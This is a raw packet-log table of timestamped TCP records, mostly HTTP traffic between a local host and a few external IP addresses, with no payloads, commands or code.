Aug 31, 2024 15:44:18.785518885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785546064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785559893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785568953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.785573006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785590887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785599947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.785600901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785612106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785621881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785623074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.785631895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785650969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.785670042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786233902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786264896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786276102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786284924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786320925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786345959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786362886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786375046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786385059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786396027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786402941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786422968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786434889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786501884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786545992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786581993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786592007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786600113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786604881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786638975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786652088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786778927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786799908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786808014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786833048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786837101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.786855936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786879063 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.786983013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787020922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787026882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.787030935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787041903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787051916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787056923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.787071943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.787091017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.787115097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787125111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787132978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787209034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.787297010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787307978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787317991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787327051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787355900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.787359953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787372112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787377119 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.787384033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787391901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.787405014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.787414074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.787442923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788177013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788219929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788223982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788229942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788264990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788269043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788279057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788300991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788305044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788312912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788321972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788326979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788332939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788338900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788357019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788362026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788376093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788386106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788386106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788403988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788414001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788414955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788439035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788448095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788476944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788496971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788507938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788541079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788558006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788613081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788680077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788753033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788769960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788779974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788789034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788799047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788803101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788809061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788820028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788820028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788830042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.788847923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.788878918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789041996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789052963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789062977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789108038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789133072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789143085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789151907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789161921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789180040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789189100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789189100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789201975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789206028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789217949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789221048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789236069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789247036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789247990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789256096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789268017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789277077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789278984 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789288044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789313078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789886951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789954901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.789983034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.789993048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790010929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790019989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790036917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790049076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790051937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.790057898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790069103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790077925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790080070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.790088892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.790090084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790101051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790103912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.790112019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790136099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.790158033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790158987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.790169001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790178061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.790210009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.790219069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.834861994 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.834882975 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.834908962 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.834938049 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.834939003 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.834985018 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.835232019 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.860430956 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:18.862015963 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:18.866758108 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:18.874123096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874133110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874171972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874182940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874182940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874196053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874208927 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874208927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874241114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874248028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874268055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874274969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874299049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874311924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874732018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874742031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874780893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874830961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874841928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874861002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874870062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874878883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874881029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874893904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.874903917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874918938 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.874943972 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.875221014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.875266075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.875278950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.875344992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.875377893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.875390053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.875401020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.875412941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.875422955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.875431061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.875441074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.875464916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.875477076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.875969887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876014948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876020908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.876043081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876051903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.876086950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.876121998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876132011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876141071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876177073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.876271963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876283884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876293898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876303911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876313925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876322985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876326084 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.876329899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876338959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876349926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876353979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.876359940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876362085 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.876382113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.876399994 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.876970053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876986027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.876996040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877005100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877015114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877043009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877065897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877078056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877089024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877130032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877326012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877341986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877353907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877362967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877372980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877402067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877409935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877419949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877429008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877430916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877459049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877479076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877849102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877860069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877871037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877898932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877906084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877922058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877924919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877942085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877949953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877953053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877962112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877964973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877971888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.877984047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.877993107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.878015995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.878016949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.878027916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.878038883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.878065109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.878086090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.878093958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.878096104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.878107071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.878149986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.878933907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.878981113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.878983974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.878990889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879018068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879033089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879049063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879060984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879070044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879080057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879090071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879091978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879117012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879128933 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879136086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879179001 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879230022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879239082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879247904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879257917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879273891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879281998 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879282951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879297018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879307985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879323006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879348993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879384995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879395008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879405022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879431963 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879446983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879468918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879478931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879488945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879498959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879534960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879550934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879638910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879650116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879661083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879688025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879695892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879709005 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879715919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879725933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879736900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879739046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879750967 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.879754066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.879765034 CEST	80	49727	52.212.52.84	192.168.2.5
